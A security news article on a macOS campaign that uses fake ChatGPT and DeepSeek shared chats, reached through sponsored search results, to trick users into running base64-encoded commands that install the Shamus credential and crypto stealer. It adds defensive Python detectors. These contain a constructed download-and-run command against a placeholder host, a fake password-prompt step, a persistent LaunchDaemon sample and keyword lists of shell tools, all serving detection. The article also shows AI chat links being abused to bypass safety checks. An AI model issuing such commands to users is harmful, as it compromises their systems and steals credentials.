A new malware campaign has emerged that exploits legitimate AI platforms to deliver malicious code directly to unsuspecting users.
Threat actors are using sponsored Google search results to redirect users searching for common macOS troubleshooting tips, such as “how to clear storage on Mac,” to fake ChatGPT and DeepSeek shared chat links.
These shared chats appear to provide helpful system instructions but actually contain hidden malicious commands designed to compromise the target system.
The attack begins when users encounter a seemingly legitimate shared chat that provides step-by-step instructions for clearing storage space on their Mac.
However, embedded within these instructions are base64-encoded commands that, when executed, download and run a sophisticated multi-stage malware program.
Google Search (Source – Breakpoint Security)
This technique is effective because it sidesteps the safety checks these AI platforms typically apply to generated responses, letting attackers deliver targeted, malicious instructions to users through the platforms' own official share links.
The infection process starts with a bash script that prompts users to enter their system password, masquerading as a credential verification prompt.
Once captured, the malware uses this password to escalate privileges and download the main malware binary from attacker-controlled servers.
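As an added defensive illustration (not code from Breakpoint Security and not derived from the campaign's own script), the Python below shows how a help-desk, chat-gateway or mail filter could flag pasted "Terminal instructions" that carry the two tells described above: a base64 blob piped straight into a shell, and a request for the reader's password. The sample chat text, the benign comparison text and the decoded command are all constructed for this example; example.invalid is a reserved name that never resolves.

```python
import base64
import binascii
import re

# Constructed stand-in for the hidden command; example.invalid is a reserved name that never resolves.
STAGE_ONE = "curl -fsSL https://example.invalid/cleanup.sh | sh"
BLOB = base64.b64encode(STAGE_ONE.encode()).decode()

# Constructed sample of a "helpful" shared-chat answer, modelled on the pattern described above.
SAMPLE_CHAT = f"""Step 1: Open Terminal (Applications > Utilities).
Step 2: Run the command below to rebuild the cache index and free space:
echo "{BLOB}" | base64 -d | sh
Step 3: Enter your password when prompted so the cleanup can verify your account."""

# Constructed benign instructions, for comparison.
BENIGN_CHAT = "Open Finder, press Cmd+Shift+G, type ~/Library/Caches and empty the folder."

B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PIPE_TO_SHELL_RE = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b[^|\n]*\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b"
)
PASSWORD_RE = re.compile(r"(?:enter|type)\s+(?:your|the)\s+(?:system\s+|admin\s+)?password", re.I)
RISKY_WORDS = ("curl", "wget", "sudo", "osascript", "chmod", "launchctl", "nohup", "bash", "zsh", "sh", "/tmp")


def decode_b64_blobs(text):
    """Yield (token, decoded_text) for each base64-looking token that decodes to printable text."""
    for tok in B64_TOKEN_RE.findall(text):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # ordinary long words rarely survive strict decoding plus UTF-8
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            yield tok, decoded


def assess_instructions(text):
    """Score pasted instructions; returns a verdict plus the decoded payloads that drove it."""
    decoded = {}
    for tok, plain in decode_b64_blobs(text):
        # Whole-word match so "sh" is not found inside "https" or "fsSL"
        hits = [w for w in RISKY_WORDS if re.search(rf"(?<![\w/]){re.escape(w)}(?!\w)", plain)]
        if hits:
            decoded[tok] = (plain, hits)
    pipes_to_shell = bool(PIPE_TO_SHELL_RE.search(text))
    asks_password = bool(PASSWORD_RE.search(text))
    if pipes_to_shell and decoded:
        verdict = "malicious-pattern"
    elif pipes_to_shell or decoded or asks_password:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "pipes_to_shell": pipes_to_shell,
            "asks_password": asks_password, "decoded": decoded}


if __name__ == "__main__":
    for name, text in (("sample chat", SAMPLE_CHAT), ("benign", BENIGN_CHAT)):
        result = assess_instructions(text)
        print(f"{name}: {result['verdict']}")
        for tok, (plain, hits) in result["decoded"].items():
            print(f"  {tok[:20]}... decodes to: {plain!r}  (risky: {', '.join(hits)})")
```

The decoder is deliberately strict (`validate=True` plus a UTF-8 and printable check) so that long ordinary words do not produce noise; the verdict only reaches "malicious-pattern" when an encoded blob both decodes to a command containing download or shell tokens and is piped into a shell on the page.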
Breakpoint Security analysts identified this sample as Shamus, a known information stealer and cryptocurrency thief that has been widely documented in security communities.
Sophisticated tactic
The malware’s sophistication lies in its multi-layered encoding and detection evasion tactics.
Reddit Post (Source – Breakpoint Security)
It uses arithmetic and XOR encoding combined with a custom 6-bit decoder to hide its malicious code from analysis tools.
This obfuscation makes it extremely difficult for security researchers to identify its true functionality through static analysis alone.
Once installed, the malware establishes persistent system access by creating a LaunchDaemon that runs automatically at startup.
This ensures the malware maintains access even after the user restarts their computer. The core functionality targets sensitive data across multiple categories, including browser cookies and passwords from Chrome, Firefox, and 12 other Chromium-based browsers.
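The LaunchDaemon described above is the kind of artifact a responder can enumerate on a suspect Mac. The following Python is an added example, not Breakpoint Security's tooling and not derived from the Shamus sample: it parses launchd property lists with the standard plistlib module and flags the traits that make an item worth a closer look (an inline shell script, paths under temporary or user-writable directories, hidden directories, download or decode helpers, and the auto-start keys that give the persistence the article describes). Both plists, their labels and their paths are constructed placeholders.

```python
import os
import plistlib
import re

# Constructed sample of a suspicious LaunchDaemon (placeholder label and paths,
# not the real Shamus artifact).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.cleanup</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>-c</string>
    <string>/private/tmp/.cache/helper &amp;&gt;/dev/null</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed sample of an unremarkable vendor daemon, for comparison.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backupagent</string>
  <key>Program</key><string>/Library/ExampleVendor/backupd</string>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

STAGING_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/folders/", "/private/var/folders/", "/Users/")
INLINE_INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}
SUSPECT_TOKENS = ("curl", "wget", "base64", "nohup", "chmod +x", "xattr -d")
HIDDEN_DIR_RE = re.compile(r"/\.[^/\s]+/")


def launch_argv(plist):
    """Return the command line launchd would run, taken from ProgramArguments or Program."""
    args = plist.get("ProgramArguments")
    if not args:
        prog = plist.get("Program")
        args = [prog] if prog else []
    return [str(a) for a in args]


def audit_launch_item(plist):
    """Return human-readable reasons the item deserves review (empty list if none)."""
    argv = launch_argv(plist)
    if not argv:
        return ["no Program or ProgramArguments"]
    cmdline = " ".join(argv)
    reasons = []
    exe = os.path.basename(argv[0])
    if exe in INLINE_INTERPRETERS and any(a in ("-c", "-e") for a in argv[1:]):
        reasons.append(f"inline script passed to {exe}")
    staging = [p for p in STAGING_PREFIXES if p in cmdline]
    if staging:
        reasons.append("references staging path(s): " + ", ".join(staging))
    if HIDDEN_DIR_RE.search(cmdline):
        reasons.append("hidden directory in command line")
    tokens = [t for t in SUSPECT_TOKENS if t in cmdline]
    if tokens:
        reasons.append("download/decode helper(s): " + ", ".join(tokens))
    # Auto-start keys only matter once something else looks off; they are normal on their own.
    if reasons and (plist.get("RunAtLoad") or plist.get("KeepAlive")):
        reasons.append("persistent: RunAtLoad/KeepAlive set")
    return reasons


def audit_plist_bytes(data):
    """Convenience wrapper: audit a plist given as raw bytes (XML or binary)."""
    return audit_launch_item(plistlib.loads(data))


def scan_directory(dirpath="/Library/LaunchDaemons"):
    """Audit every .plist in a launchd directory; returns {path: reasons} for flagged items."""
    flagged = {}
    for name in sorted(os.listdir(dirpath)):
        if not name.endswith(".plist"):
            continue
        path = os.path.join(dirpath, name)
        try:
            with open(path, "rb") as fp:
                plist = plistlib.load(fp)  # handles both XML and binary plists
        except Exception as exc:  # malformed file: report it rather than abort the scan
            flagged[path] = [f"unparseable: {exc}"]
            continue
        reasons = audit_launch_item(plist)
        if reasons:
            flagged[path] = reasons
    return flagged


if __name__ == "__main__":
    for label, data in (("suspicious", SUSPICIOUS_PLIST), ("benign", BENIGN_PLIST)):
        print(label, audit_plist_bytes(data) or "no findings")
    for d in ("/Library/LaunchDaemons", "/Library/LaunchAgents"):
        if os.path.isdir(d):
            for path, reasons in scan_directory(d).items():
                print(path, reasons)
```

Run on a live system the script walks /Library/LaunchDaemons and /Library/LaunchAgents and prints only items with findings; per-user agents under ~/Library/LaunchAgents can be passed to scan_directory the same way. The heuristics are indicators, not proof: a vendor daemon that legitimately lives under /Users/ will show up and needs a human decision.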
Deepseek Post (Source – Breakpoint Security)
The threat extends to cryptocurrency wallets, with the malware specifically targeting 15 different desktop and hardware wallet applications, including Ledger Live, Trezor Suite, Exodus, Coinomi, Electrum, and Bitcoin Core.
Additionally, the malware steals the entire macOS Keychain database, Telegram session data, VPN profiles, and files from the desktop and Documents folders.
After collection, all stolen data is compressed and transmitted to the attacker’s command-and-control servers using encrypted communications.
This campaign represents a sophisticated evolution in malware distribution, demonstrating how threat actors continue to find new ways to bypass security measures and compromise user systems.
The post Hackers Leveraging LLM Shared Chats to Steal Your Passwords and Crypto appeared first on Cyber Security News.